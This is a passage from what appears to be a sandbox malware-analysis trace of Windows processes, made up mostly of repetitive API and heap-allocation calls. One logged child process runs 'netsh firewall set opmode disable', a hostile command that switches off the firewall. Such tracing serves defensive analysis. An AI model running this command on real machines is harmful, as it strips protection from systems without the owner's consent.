lpMode=0xfc3894) returned 1 [0164.850] _get_osfhandle (_FileHandle=0) returned 0x8c [0164.850] SetConsoleMode (hConsoleHandle=0x8c, dwMode=0x1e7) returned 1 [0165.058] SetConsoleInputExeNameW () returned 0x1 [0165.058] GetConsoleOutputCP () returned 0x1b5 [0165.170] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xfc3850 | out: lpCPInfo=0xfc3850) returned 1 [0165.171] SetThreadUILanguage (LangId=0x0) returned 0xdc0409 [0165.258] exit (_Code=1) [0165.258] ??_V@YAXPAX@Z () returned 0x1 Thread: id = 57 os_tid = 0xdb4 Process: id = "9" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x1c413000" os_pid = "0x4b4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0x514" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 43 os_tid = 0xd44 Thread: id = 45 os_tid = 0xabc Thread: id = 49 os_tid = 0xce0 Thread: id = 50 os_tid = 0xdc8 Thread: id = 53 os_tid = 0xc1c Process: id = "10" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x1e5d5000" os_pid = "0xd38" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "8" os_parent_pid = "0xd0c" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 44 os_tid = 0xd28 Thread: id = 46 os_tid = 0xab0 Thread: id = 48 os_tid = 0xb90 Thread: id = 52 os_tid = 0x888 Thread: id = 55 os_tid = 0xa84 Process: id = "11" image_name = "netsh.exe" filename = "c:\\windows\\syswow64\\netsh.exe" page_root = "0x3e415000" os_pid = "0x728" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0xff0" cmd_line = "netsh firewall set opmode disable" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 61 os_tid = 0x824 [0107.144] GetModuleHandleA (lpModuleName=0x0) returned 0x15b0000 [0107.144] __set_app_type (_Type=0x1) [0107.144] __p__fmode () returned 0x776f3c14 [0107.144] __p__commode () returned 0x776f49ec [0107.145] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x15b9a90) returned 0x0 [0107.145] __wgetmainargs (in: _Argc=0x15c33e8, _Argv=0x15c33ec, _Env=0x15c33f0, _DoWildCard=0, _StartInfo=0x15c33fc | out: _Argc=0x15c33e8, _Argv=0x15c33ec, _Env=0x15c33f0) returned 0 [0107.146] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0107.146] GetModuleHandleW (lpModuleName=0x0) returned 0x15b0000 [0107.146] _vsnwprintf (in: _Buffer=0x15c4ae0, _BufferCount=0x1fff, _Format="%s>", _ArgList=0x7f7a04 | out: _Buffer="netsh>") returned 6 [0107.146] GetProcessHeap () returned 0xc50000 [0107.146] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5b418 [0107.146] GetProcessHeap () returned 0xc50000 [0107.146] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5b538 [0107.146] GetProcessHeap () returned 0xc50000 [0107.146] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5b438 [0107.146] GetProcessHeap () returned 0xc50000 [0107.146] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5b548 [0107.146] GetProcessHeap () returned 0xc50000 [0107.146] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5b448 [0107.146] GetProcessHeap () returned 0xc50000 [0107.146] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5b4b8 [0107.146] GetProcessHeap () returned 0xc50000 [0107.146] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5b558 [0107.146] GetProcessHeap () returned 0xc50000 [0107.147] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5cf80 [0107.147] GetProcessHeap () returned 0xc50000 [0107.147] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5ce80 [0107.147] GetProcessHeap () returned 0xc50000 [0107.147] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5cfe0 [0107.147] GetProcessHeap () returned 0xc50000 [0107.147] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5cfd0 [0107.147] GetProcessHeap () returned 0xc50000 [0107.147] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5cf30 [0107.147] GetProcessHeap () returned 0xc50000 [0107.147] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5cf50 [0107.147] GetProcessHeap () returned 0xc50000 [0107.147] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5cec0 [0107.147] GetProcessHeap () returned 0xc50000 [0107.147] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5cf70 [0107.147] GetProcessHeap () returned 0xc50000 [0107.147] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5ce60 [0107.147] GetProcessHeap () returned 0xc50000 [0107.147] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5cf60 [0107.147] GetProcessHeap () returned 0xc50000 [0107.147] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5cfb0 [0107.147] GetProcessHeap () returned 0xc50000 [0107.147] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5ce50 [0107.147] GetProcessHeap () returned 0xc50000 [0107.147] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d000 [0107.147] GetProcessHeap () returned 0xc50000 [0107.147] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5cf90 [0107.147] GetProcessHeap () returned 0xc50000 [0107.147] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5cff0 [0107.147] GetProcessHeap () returned 0xc50000 [0107.147] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d010 [0107.147] GetProcessHeap () returned 0xc50000 [0107.147] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5cfa0 [0107.147] GetProcessHeap () returned 0xc50000 [0107.147] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5cfc0 [0107.147] GetProcessHeap () returned 0xc50000 [0107.147] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5cef0 [0107.147] GetProcessHeap () returned 0xc50000 [0107.147] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5cf20 [0107.147] GetProcessHeap () returned 0xc50000 [0107.148] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5cf00 [0107.148] GetProcessHeap () returned 0xc50000 [0107.148] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5ce70 [0107.148] GetProcessHeap () returned 0xc50000 [0107.148] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5cf10 [0107.148] GetProcessHeap () returned 0xc50000 [0107.148] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5ce90 [0107.148] GetProcessHeap () returned 0xc50000 [0107.148] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5ced0 [0107.148] GetProcessHeap () returned 0xc50000 [0107.148] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5cea0 [0107.148] GetProcessHeap () returned 0xc50000 [0107.148] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5cf40 [0107.148] GetProcessHeap () returned 0xc50000 [0107.148] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5ceb0 [0107.148] GetProcessHeap () returned 0xc50000 [0107.148] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5cee0 [0107.148] GetProcessHeap () returned 0xc50000 [0107.148] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5cc70 [0107.148] GetProcessHeap () returned 0xc50000 [0107.148] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5ccf0 [0107.148] GetProcessHeap () returned 0xc50000 [0107.148] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5cd80 [0107.148] GetProcessHeap () returned 0xc50000 [0107.148] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5cd50 [0107.148] GetProcessHeap () returned 0xc50000 [0107.148] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5cc80 [0107.148] GetProcessHeap () returned 0xc50000 [0107.148] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5cd60 [0107.148] GetProcessHeap () returned 0xc50000 [0107.148] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5ce00 [0107.148] GetProcessHeap () returned 0xc50000 [0107.148] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5cda0 [0107.148] GetProcessHeap () returned 0xc50000 [0107.148] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5cd00 [0107.148] GetProcessHeap () returned 0xc50000 [0107.148] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5ccd0 [0107.148] GetProcessHeap () returned 0xc50000 [0107.148] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5cde0 [0107.149] GetProcessHeap () returned 0xc50000 [0107.149] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5cd10 [0107.149] GetProcessHeap () returned 0xc50000 [0107.149] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5cd90 [0107.149] GetProcessHeap () returned 0xc50000 [0107.149] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5ce40 [0107.149] GetProcessHeap () returned 0xc50000 [0107.149] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5ccc0 [0107.149] GetProcessHeap () returned 0xc50000 [0107.149] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5cc90 [0107.149] GetProcessHeap () returned 0xc50000 [0107.149] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5cd70 [0107.149] GetProcessHeap () returned 0xc50000 [0107.149] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5cce0 [0107.149] GetProcessHeap () returned 0xc50000 [0107.149] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5cdb0 [0107.149] GetProcessHeap () returned 0xc50000 [0107.149] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5cdf0 [0107.149] GetProcessHeap () returned 0xc50000 [0107.149] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5cd20 [0107.149] GetProcessHeap () returned 0xc50000 [0107.149] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5cd30 [0107.149] GetProcessHeap () returned 0xc50000 [0107.149] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5cdc0 [0107.149] GetProcessHeap () returned 0xc50000 [0107.149] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5cca0 [0107.149] GetProcessHeap () returned 0xc50000 [0107.149] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5cc50 [0107.149] GetProcessHeap () returned 0xc50000 [0107.149] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5ce10 [0107.149] GetProcessHeap () returned 0xc50000 [0107.149] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5ce20 [0107.149] GetProcessHeap () returned 0xc50000 [0107.149] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5ce30 [0107.149] GetProcessHeap () returned 0xc50000 [0107.149] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5cc60 [0107.149] GetProcessHeap () returned 0xc50000 [0107.149] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5cd40 [0107.149] GetProcessHeap () returned 0xc50000 [0107.149] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5ccb0 [0107.150] GetProcessHeap () returned 0xc50000 [0107.150] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5cdd0 [0107.150] GetProcessHeap () returned 0xc50000 [0107.150] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d138 [0107.150] GetProcessHeap () returned 0xc50000 [0107.150] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d128 [0107.150] GetProcessHeap () returned 0xc50000 [0107.150] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d208 [0107.150] GetProcessHeap () returned 0xc50000 [0107.150] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d158 [0107.150] GetProcessHeap () returned 0xc50000 [0107.150] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d1a8 [0107.150] GetProcessHeap () returned 0xc50000 [0107.150] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d168 [0107.150] GetProcessHeap () returned 0xc50000 [0107.150] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d148 [0107.150] GetProcessHeap () returned 0xc50000 [0107.150] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d178 [0107.150] GetProcessHeap () returned 0xc50000 [0107.150] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d188 [0107.150] GetProcessHeap () returned 0xc50000 [0107.150] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d198 [0107.150] GetProcessHeap () returned 0xc50000 [0107.150] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d1b8 [0107.150] GetProcessHeap () returned 0xc50000 [0107.150] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d1c8 [0107.150] GetProcessHeap () returned 0xc50000 [0107.150] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d1d8 [0107.150] GetProcessHeap () returned 0xc50000 [0107.150] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d058 [0107.150] GetProcessHeap () returned 0xc50000 [0107.150] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d218 [0107.150] GetProcessHeap () returned 0xc50000 [0107.150] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d248 [0107.150] GetProcessHeap () returned 0xc50000 [0107.150] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d068 [0107.150] GetProcessHeap () returned 0xc50000 [0107.150] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d0b8 [0107.150] GetProcessHeap () returned 0xc50000 [0107.150] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d0c8 [0107.151] GetProcessHeap () returned 0xc50000 [0107.151] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d0e8 [0107.151] GetProcessHeap () returned 0xc50000 [0107.151] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d238 [0107.151] GetProcessHeap () returned 0xc50000 [0107.151] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d228 [0107.151] GetProcessHeap () returned 0xc50000 [0107.151] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d1e8 [0107.151] GetProcessHeap () returned 0xc50000 [0107.151] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d078 [0107.151] GetProcessHeap () returned 0xc50000 [0107.151] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d088 [0107.151] GetProcessHeap () returned 0xc50000 [0107.151] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d0f8 [0107.151] GetProcessHeap () returned 0xc50000 [0107.151] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d1f8 [0107.151] GetProcessHeap () returned 0xc50000 [0107.151] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d098 [0107.151] GetProcessHeap () returned 0xc50000 [0107.151] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d0a8 [0107.151] GetProcessHeap () returned 0xc50000 [0107.151] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d0d8 [0107.151] GetProcessHeap () returned 0xc50000 [0107.151] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d108 [0107.151] GetProcessHeap () returned 0xc50000 [0107.151] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d118 [0107.151] GetProcessHeap () returned 0xc50000 [0107.151] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d368 [0107.151] GetProcessHeap () returned 0xc50000 [0107.151] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d328 [0107.151] GetProcessHeap () returned 0xc50000 [0107.151] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d2a8 [0107.151] GetProcessHeap () returned 0xc50000 [0107.151] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d388 [0107.151] GetProcessHeap () returned 0xc50000 [0107.151] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d2b8 [0107.151] GetProcessHeap () returned 0xc50000 [0107.151] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d2e8 [0107.152] GetProcessHeap () returned 0xc50000 [0107.152] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d3a8 [0107.152] GetProcessHeap () returned 0xc50000 [0107.152] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d358 [0107.152] GetProcessHeap () returned 0xc50000 [0107.152] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d278 [0107.152] GetProcessHeap () returned 0xc50000 [0107.152] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d338 [0107.152] GetProcessHeap () returned 0xc50000 [0107.152] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d348 [0107.152] GetProcessHeap () returned 0xc50000 [0107.152] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d308 [0107.152] GetProcessHeap () returned 0xc50000 [0107.152] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d2c8 [0107.152] GetProcessHeap () returned 0xc50000 [0107.152] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d3c8 [0107.152] GetProcessHeap () returned 0xc50000 [0107.152] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d418 [0107.152] GetProcessHeap () returned 0xc50000 [0107.152] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d398 [0107.152] GetProcessHeap () returned 0xc50000 [0107.152] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d378 [0107.152] GetProcessHeap () returned 0xc50000 [0107.152] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d3f8 [0107.152] GetProcessHeap () returned 0xc50000 [0107.152] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d2f8 [0107.152] GetProcessHeap () returned 0xc50000 [0107.152] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d3b8 [0107.152] GetProcessHeap () returned 0xc50000 [0107.152] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d318 [0107.152] GetProcessHeap () returned 0xc50000 [0107.152] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d3d8 [0107.152] GetProcessHeap () returned 0xc50000 [0107.152] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d3e8 [0107.152] GetProcessHeap () returned 0xc50000 [0107.152] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d2d8 [0107.152] GetProcessHeap () returned 0xc50000 [0107.152] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d288 [0107.152] GetProcessHeap () returned 0xc50000 [0107.152] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d408 [0107.153] GetProcessHeap () returned 0xc50000 [0107.153] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d258 [0107.153] GetProcessHeap () returned 0xc50000 [0107.153] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d268 [0107.153] GetProcessHeap () returned 0xc50000 [0107.153] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d298 [0107.153] GetProcessHeap () returned 0xc50000 [0107.153] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d630 [0107.153] GetProcessHeap () returned 0xc50000 [0107.153] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d470 [0107.153] GetProcessHeap () returned 0xc50000 [0107.153] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d4c0 [0107.153] GetProcessHeap () returned 0xc50000 [0107.153] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d650 [0107.153] GetProcessHeap () returned 0xc50000 [0107.153] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d550 [0107.153] GetProcessHeap () returned 0xc50000 [0107.153] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d4f0 [0107.153] GetProcessHeap () returned 0xc50000 [0107.153] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d4a0 [0107.153] GetProcessHeap () returned 0xc50000 [0107.153] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d480 [0107.153] GetProcessHeap () returned 0xc50000 [0107.153] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d640 [0107.153] GetProcessHeap () returned 0xc50000 [0107.153] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d5f0 [0107.153] GetProcessHeap () returned 0xc50000 [0107.153] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d500 [0107.153] GetProcessHeap () returned 0xc50000 [0107.153] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d460 [0107.153] GetProcessHeap () returned 0xc50000 [0107.153] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d490 [0107.153] GetProcessHeap () returned 0xc50000 [0107.153] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d4b0 [0107.153] GetProcessHeap () returned 0xc50000 [0107.153] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d5d0 [0107.153] GetProcessHeap () returned 0xc50000 [0107.153] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d4e0 [0107.153] GetProcessHeap () returned 0xc50000 [0107.153] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d510 [0107.154] GetProcessHeap () returned 0xc50000 [0107.154] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d5e0 [0107.154] GetProcessHeap () returned 0xc50000 [0107.154] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d5b0 [0107.154] GetProcessHeap () returned 0xc50000 [0107.154] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d4d0 [0107.154] GetProcessHeap () returned 0xc50000 [0107.154] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d600 [0107.154] GetProcessHeap () returned 0xc50000 [0107.154] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d560 [0107.154] GetProcessHeap () returned 0xc50000 [0107.154] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d520 [0107.154] GetProcessHeap () returned 0xc50000 [0107.154] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d530 [0107.154] GetProcessHeap () returned 0xc50000 [0107.154] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d5c0 [0107.154] GetProcessHeap () returned 0xc50000 [0107.154] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d570 [0107.154] GetProcessHeap () returned 0xc50000 [0107.154] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d540 [0107.154] GetProcessHeap () returned 0xc50000 